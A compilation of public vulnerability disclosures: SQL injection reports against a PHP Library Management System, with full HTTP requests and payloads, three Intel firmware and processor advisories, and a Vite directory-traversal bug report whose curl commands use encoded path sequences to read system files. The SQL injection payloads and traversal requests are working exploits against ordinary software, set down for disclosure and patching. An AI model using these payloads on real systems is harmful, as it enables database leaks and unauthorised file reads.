Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the M_Id parameter at /student/dele.php.

Permalink

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/student/dele.php

Vulnerability location: /LMS/student/dele.php, M\_Id

\[+\] Payload: delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> M\_Id

POST /LMS/student/dele.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
delete=&M\_Id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-36725: bug_report/SQLi-15.md at main · k0xx11/bug_report

Library Management System v1.0 was discovered to contain a SQL injection vulnerability via the title parameter at /librarian/history.php.

Permalink

Cannot retrieve contributors at this time

**Library Management System v1.0 by kingbhob02 has SQL injection**

vendors: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /LMS/librarian/history.php

Vulnerability location: /LMS/librarian/history.php?title=, title

\[+\] Payload: submit=&title=1' union select 1,database(),3,4--+ // Leak place ---> title

POST /LMS/librarian/history.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=7v8p4p3goshl3b4fkncu3bh9ui
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
submit=&title=1' union select 1,database(),3,4--+

CVE-2022-36722: bug_report/SQLi-14.md at main · k0xx11/bug_report

Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi and Killer™ WiFi Advisory**

Intel ID:

INTEL-SA-00621

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

08/09/2022

Last revised:

08/09/2022

**Summary: **

Potential security vulnerabilities in some Intel® PROSet/Wireless WiFi and Killer™ WiFi products may allow escalation of privilege, information disclosure or denial of service. Intel is releasing firmware and software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID:  CVE-2022-21181

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID:  CVE-2021-37409

Description: Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID:  CVE-2021-23223

Description: Improper initialization for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID:  CVE-2021-23168

Description: Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVEID:  CVE-2021-44545

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVEID:  CVE-2021-26254

Description: Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID:  CVE-2022-21172

Description: Out of bounds write for some Intel(R) PROSet/Wireless WiFi products may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVEID:  CVE-2022-21240

Description: Out of bounds read for some Intel(R) PROSet/Wireless WiFi products may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H

CVEID:  CVE-2022-21139

Description: Inadequate encryption strength for some Intel(R) PROSet/Wireless WiFi products may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 5.4 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVEID:  CVE-2022-21197

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi products may allow an unauthenticated user to potentially enable denial of service via network access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID:  CVE-2022-21160

Description: Improper buffer restrictions for some Intel(R) PROSet/Wireless WiFi products may allow an unauthenticated user to potentially enable denial of service via network access.

CVSS Base Score: 5.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID:  CVE-2021-23188

Description: Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 4.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

CVEID:  CVE-2022-21212

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access.

CVSS Base Score: 4.3 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVEID:  CVE-2022-21140

Description: Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.2 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

**Affected Products:**

Intel® PROSet/Wireless WiFi software before version 22.120, Killer™ WiFi software before version 3.1122.1105 and UEFI version 2.2.12.22071.

CVE ID

Affected Products

Affected OS

CVE-2022-21181

Intel® Dual Band Wireless-AC 8265

Intel® Dual Band Wireless-AC 8260

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

Windows 10 & 11

Linux

Chrome OS

CVE-2022-21181

Killer™ Wireless-AC 1550

Windows 10 & 11

CVE-2021-23223

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Windows 10 & 11

Linux

Chrome OS

UEFI

CVE-2021-23223

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Windows 10 & 11

CVE-2021-37409

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

Windows 10 & 11

Linux

Chrome OS

UEFI

CVE-2021-37409

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Killer™ Wireless-AC 1550

Windows 10 & 11

CVE-2022-21140, CVE-2021-23188

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

Intel® Dual Band Wireless-AC 3168

Intel® Wireless 7265 (Rev D) Family

Intel® Dual Band Wireless-AC 3165

Intel® Dual Band Wireless-AC 8265

Intel® Dual Band Wireless-AC 8260

Windows 10 & 11

CVE-2022-21140, CVE-2021-23188

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Killer™ Wireless-AC 1550

Windows 10 & 11

CVE-2021-26254

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

CVE-2021-26254

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

CVE-2021-23168

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

Intel® Dual Band Wireless-AC 3168

Intel® Wireless 7265 (Rev D) Family

Intel® Dual Band Wireless-AC 3165

Intel® Dual Band Wireless-AC 8265

Intel® Dual Band Wireless-AC 8260

Windows 10 & 11

Linux

Chrome OS

CVE-2021-23168

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Killer™ Wireless-AC 1550

Windows 10 & 11

CVE-2021-44545

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

Linux

UEFI

CVE-2021-44545

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

CVE-2022-21212, CVE-2022-21197, CVE-2022-21160, CVE-2022-21139

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Intel® Wireless-AC 9560

Intel® Wireless-AC 9462

Intel® Wireless-AC 9461

Intel® Wireless-AC 9260

UEFI

CVE-2022-21172, CVE-2022-21240

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

UEFI

**Recommendations:**

**Windows:**

Intel recommends updating Intel® PROSet/Wireless WiFi software to version 22.120 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19351/windows-10-and-windows-11-wi-fi-drivers-for-intel-wireless-adapters.html

Intel recommends updating Killer™ WiFi software to version 3.1122.1105 or later.

Updates for Killer™ products are available for download at this location:

https://www.intel.com/content/www/us/en/download/19779/intel-killer-performance-suite.html

Important note regarding the mitigation of CVE-2022-21181:

For the below Intel vPro® platforms that have Intel® Active Management Technology (AMT) provisioned and Wireless AMT enabled, the CSME version needs to be updated as well.

**Platform**

**CSME Version**

**Device**

11th Generation Intel® Core Processor

15.0.41

Intel® Wireless-AC 9260

9th Generation Intel® Core Processor

12.0.90

Intel® Wireless-AC 9260  
Intel® Wireless-AC 9560

8th Generation Intel® Core Processor

12.0.90

Intel® Wireless-AC 9260  
Intel® Wireless-AC 9560

7th Generation Intel® Core Processor  
6th Generation Intel® Core Processor

11.8.92 (11.12,11.22 for workstations)

Intel® Dual Band Wireless-AC 8265  
Intel® Dual Band Wireless-AC 8260

Intel recommends that users of Intel® vPRO® CSME WiFi products update to the latest version provided by the system manufacturer that addresses these issues.

**UEFI:**

Intel recommends updating Intel® PROSet/Wireless WiFi UEFI drivers to version 2.2.12.22071 or later.

Please contact your OEM support group to obtain the correct driver version.

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate these vulnerabilities will be up streamed to Chromium by August 09, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate these vulnerabilities will be up streamed by August 09, 2022.

Consult the regular opensource channels to obtain this update.

**Acknowledgements:**

Intel would like to thank Nicholas Iooss and Gabriel Campana of Ledger Donjon for reporting CVE-2022-21181. The remaining issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-23168: INTEL-SA-00621

Out of bounds read in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Wireless Bluetooth® and Killer™ Bluetooth® Advisory**

Intel ID:

INTEL-SA-00628

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

08/09/2022

Last revised:

08/09/2022

**Summary: **

Potential security vulnerabilities in some Intel® Wireless Bluetooth® and Killer™ Bluetooth® products may allow escalation of privilege, denial of service or information disclosure. Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID:  CVE-2021-33847

Description: Improper buffer restrictions in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.9 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L

CVEID:  CVE-2021-26257

Description: Improper buffer restrictions in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H

CVEID:  CVE-2021-26950

Description: Out of bounds read in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H

CVEID:  CVE-2021-23179

Description: Out of bounds read in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.3 Low

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

**Affected Products:**

Intel® Wireless Bluetooth® products:

*   Intel® Wi-Fi 6 AX411
*   Intel® Wi-Fi 6 AX211
*   Intel® Wi-Fi 6 AX210
*   Intel® Wi-Fi 6 AX201
*   Intel® Wi-Fi 6 AX200
*   Intel® Wireless-AC 9560
*   Intel® Wireless-AC 9462
*   Intel® Wireless-AC 9461
*   Intel® Wireless-AC 9260
*   Intel® Dual Band Wireless-AC 8265
*   Intel® Dual Band Wireless-AC 8260
*   Intel® Dual Band Wireless-AC 3168
*   Intel® Wireless 7265 (Rev D) Family
*   Intel® Dual Band Wireless-AC 3165

Killer™ Bluetooth® products:

*   Killer™ Wi-Fi 6E AX1690
*   Killer™ Wi-Fi 6E AX1675         
*   Killer™ Wi-Fi 6 AX1650
*   Killer™ Wireless-AC 1550

**Recommendations:**

**Windows OS:**

Intel recommends updating the affected Intel® Wireless Bluetooth® and Killer™ Bluetooth® products to version 22.120 or later.

Windows 10 and Windows 11 updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/18649/intel-wireless-bluetooth-for-windows-10-and-windows-11.html

**Acknowledgements:**

The following issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-23179: INTEL-SA-00628

Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.2 IPU - Intel® Processor Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to address this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-21233

Description: Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

Consult this list of affected products here.

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest version firmware provided by the system manufacturer that addresses these issues.  In addition, Intel will be releasing Intel® SGX SDK updates soon after public embargo is lifted.

Intel has released microcode updates for the affected Intel® Processors that are currently supported on the public github repository. Please see details below on access to the microcode: 

GitHub\*: Public Github: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files

For Intel® SGX customers, please note there is a known sighting that affects the patch installation recommendation for 3rd Generation Intel® Xeon® Scalable Processors, Codename Icelake-SP, further details and a workaround are available here.

Intel® SGX SDK Download Links:  

*   Intel SGX SDK for Windows v2.16.101.1 and later have the mitigations:  
    https://registrationcenter.intel.com/en/products/download/3407/
*   Intel SGX SDK for Linux v2.17.101.1 and later have the mitigations:  
    https://01.org/intel-software-guard-extensions/downloads

Intel SGX TCB Recovery Plans:  

Further details around the planned Intel SGX TCB recovery can be found here.  

Refer to Intel SGX Attestation Technical Details for more information on the Intel SGX TCB recovery process.

Further TCB Recovery Guidance for developers is available.

**Acknowledgements:**

Intel would like to thank Pietro Borrello from Sapienza University of Rome, Andreas Kogler, Martin Schwarzl, Daniel Gruss from Graz University of Technology, Michael Schwarz from CISPA Helmholtz Center for Information Security and Moritz Lipp from Amazon Web Services for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21233: INTEL-SA-00657

Vitejs Vite before v2.9.13 was discovered to allow attackers to perform a directory traversal via a crafted URL to the victim's service.

**Describe the bug**

The vulnerability found at #2820 was found to be not fixed properly, which leads to the unrestricted directory traversal.

Currently the @fs directory does check for the allowed path, but it does not check for encoded paths.

For example, assuming that /@fs/home/test/ is the only allowed path, this can be bypassed by accessing /@fs/home/test/%2e%2e%2f%2e%2e%2f, which translates to /@fs/home/test/../../ internally.

Since this way of access through the browser may output an inconsistent result, curl --path-as-is can be used as an alternative way to reproduce such issue.

**Reproduction**

Any vite project is affected by this vulnerability.

npm init @vitejs/app app
cd app
npm install
npm run dev

**Reproduction in Windows**

Accessing C:/Windows/System32/drivers/etc/hosts is blocked since the allow list only contains C:/Users/stypr/Desktop/development/q/vite-project.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Windows/System32/drivers/etc/hosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Windows/System32/drivers/etc/hosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Access-Control-Allow-Origin: \*
< Date: Wed, 08 Jun 2022 04:00:32 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< Transfer-Encoding: chunked
<

    <body\>
      <h1>403 Restricted</h1>
      <p\>The request url "C:/Windows/System32/drivers/etc/hosts" is outside of Vite serving allow list.<br/><br/\>\- C:/Users/stypr/Desktop/development/q/vite-project<br/><br/\>Refer to docs https://vitejs.dev/config/#server-fs-allow for configurations and more details.</p>
      <style\>
        body {
          padding: 1em 2em;
        }
      </style\>
    </body\>
  \* Connection #0 to host localhost left intact
  \* 

What if we access like C:/Users/stypr/Desktop/development/q/vite-project/../../../../../../Windows/System32/drivers/etc/hosts? In typical cases, this doesn't work

However, if we replace the path ../ as %2e%2e%2f and replace every trailing slashes to %2f, the check is bypassed and the path traversal becomes successful.

$ curl --path-as-is -v "http://localhost:3001/@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts"
\*   Trying ::1:3001...
\*   Trying 127.0.0.1:3001...
\* Connected to localhost (127.0.0.1) port 3001 (#0)
\> GET /@fs/C:/Users/stypr/Desktop/development/q/vite-project/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts HTTP/1.1
\> Host: localhost:3001
\> User-Agent: curl/7.75.0
\> Accept: \*/\*
\>
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Access-Control-Allow-Origin: \*
< Content-Length: 824
< Content-Type:
< Last-Modified: Tue, 31 May 2022 03:15:34 GMT
< ETag: W/"824-1653966934106"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 03:53:26 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
<
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
\*a Connection #0 to host localhost left intact

**Reproduction in Linux**

Linux is also pretty much the same, you can first get the whitelist path (/srv/q/app) by accessing a random path(/@fs/...), and then do a path traversal based on the given whitelist.

curl -v --path-as-is "http://192.168.125.129:3000/@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts"
\*   Trying 192.168.125.129:3000...
\* TCP\_NODELAY set
\* Connected to 192.168.125.129 (192.168.125.129) port 3000 (#0)
\> GET /@fs/srv/q/app/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.1
\> Host: 192.168.125.129:3000
\> User-Agent: curl/7.68.0
\> Accept: \*/\*
\> 
\* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
